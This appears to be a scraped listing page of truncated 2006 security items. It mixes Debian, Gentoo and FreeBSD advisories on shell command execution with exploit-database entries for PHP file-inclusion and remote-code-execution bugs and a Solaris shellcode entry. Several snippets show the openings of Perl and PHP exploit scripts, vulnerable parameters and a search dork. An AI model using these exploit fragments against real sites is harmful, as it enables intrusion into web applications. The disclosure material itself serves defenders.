[SECURITY] [DSA 1220-1] New pstotext packages fix arbitrary shell command execution

-------------------------------------------------------------------------- Debian Security Advisory DSA 1220-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff November 26th, 2006 http://www.debian.org/security/faq -...

ag231-rfi.txt

%%%%%%%%%%%%%%%%%%%% Advanced Guestbook 2.3.1 Admin.php Remote File Include %%%%%%%%%%%%%%%%%%%% Author: BrokeN-ProXy Script : admin.php Found : www.hotscripts.com Risk : Dangerous Dork : "powered by: Advanced Guestbook 2.3.1" %%%%%%%%%%%%%%%%%%%% Exploit: www.Site.com/AGuest...

Quick.Cms.Lite <= 0.3 (Cookie sLanguage) Local File Include Exploit

Exploit for unknown platform in category web applications =================================================================== Quick.Cms.Lite = 0.3 Cookie sLanguage Local File Include Exploit =================================================================== ? print ' ::::::::: :::::::::: ::: :::...

MDPro <= 1.0.76 (Cookie: PNSVlang) Local File Include Exploit

Exploit for unknown platform in category web applications ============================================================= MDPro = 1.0.76 Cookie: PNSVlang Local File Include Exploit ============================================================= ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :...

PostNuke 0.763 - PNSV lang Remote Code Execution

PostNuke 0.763 - PNSV lang Remote Code Execution DEVIL TEAM IRC: 72.20.18.6:6667 devilteam ======== Contact: [email protected] or http://www.rahim.webd.pl/ cod3d by Kacper -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Greetings DragonHeart and all DEVIL TEAM Patrio...

[Full-disclosure] [SECURITY] [DSA 1204-1] New ingo1 packages fix arbitrary shell command execution

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1204-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff November 2nd, 2006 http://www.debian.org/security/faq -...

Free File Hosting &lt;= 1.1 (forgot_pass.php) File Include Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? print ' | \\ | \\ | \ . . |\ \ \ /\ \ / /| || | | | | \ | \ Y / | || | | \ | \ \ / | || | |/ // / / ||| \ | / / \ / \ |\ /\ / / \ / \ | | | | / /\ \ / \ / \ | | | | / | / Y \ || / /| /| /...

Free File Hosting 1.1 - forgot_pass.php File Inclusion

Free File Hosting 1.1 - forgotpass.php File Inclusion !/usr/bin/php -q -d shortopentag=on | | \\ | | | | | | \ //----------------------- | DEVIL TEAM - POLISH TEAM \/ http://www.rahim.webd.pl/ . .\ . \ / | | ||/ | || / \ | \ / /\ | | / | \ \ | |/ \ / \ | \ | || | | | | \ | / //\ |...

Imageview 5 - &#039;/Cookie/index.php&#039; Local/Remote File Inclusion

!/usr/bin/php -q -d shortopentag=on ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+...

PHP-Post &lt;= 1.01 &#40;template&#41; Remote Code Execution Exploit

!/usr/bin/php -q -d shortopentag=on ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+...

solaris/sparc executes command after setreuid (92 bytes + cmd)

Exploit for solaris/sparc platform in category shellcode ============================================================== solaris/sparc executes command after setreuid 92 bytes + cmd ============================================================== / bunkersparcexec.c V1.0 - Sat Oct 21 17:45:27 CEST...

FreeBSD : ingo -- local arbitrary shell command execution (18a14baa-5ee5-11db-ae08-0008743bf21a)

The Horde team reports a vulnerability within Ingo, the filter management suite. The vulnerability is caused due to inadequete escaping, possibly allowing a local user to execute arbitrary shell commands via procmail. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and...

WSN Forum 1.3.4 - &#039;prestart.php&#039; Remote Code Execution

!/usr/bin/php -q -d shortopentag=on ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+...

phpBurningPortal 1.0.1 - &#039;lang_path&#039; Remote File Inclusion

!/usr/bin/perl use LWP::UserAgent; use LWP::Simple; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = "questdelete.php?langpath="; elsif $fileno eq 2 $file = "questedit.php?langpath="; elsif $fileno eq 3...

Debian DSA-1021-1 : netpbm-free - insecure program execution

Max Vozeler from the Debian Audit Project discovered that pstopnm, a converter from Postscript to the PBM, PGM and PNM formats, launches Ghostscript in an insecure manner, which might lead to the execution of arbitrary shell commands, when converting specially crafted Postscript files...

ae2-include.txt

ae2 standart.inc.php Remote File Inclusion Download Source : http://ae.utbm.fr/equipeinfo/siteae-utbm-latest.tar.gz Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; standart.inc.php bugs ; requireonce$topdir . "include/lib/wiki2xhtml.inc.php"; requireonce$topdi...

AlberT-EasySite &lt;= 1.0.a5 Remote File Inclusion

AlberT-EasySite = 1.0.a5 Remote File Inclusion Download Source : http://www.superalbert.it/download/AlberT-EasySite/AES1.0a5.tar.gz Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; logout.php bugs ; requireonce $PSAPATH.'/include/config.php'; exmple and methode...

Redaction System 1.0 (lang_prefix) Remote File Include Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = " conn.php?langprefix="; elsif $fileno eq 2 $file = "index.php?lang="; elsif $fileno ...

blueshoes &lt;= 4.6_public Remote File Inclusion

blueshoes = 4.6public Remote File Inclusion Download Source : http://download.blueshoes.org/blueshoes-4.6public.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; GoogleSearch.php bugs ; requireonce$APP'path''lib' . 'nusoap.php'; exmple and methode exploit ;...

GLSA-200609-20 : DokuWiki: Shell command injection and Denial of Service

The remote host is affected by the vulnerability described in GLSA-200609-20 DokuWiki: Shell command injection and Denial of Service Input validation flaws have been discovered in the image handling of fetch.php if ImageMagick is used, which is not the default method. Impact : A remote attacker...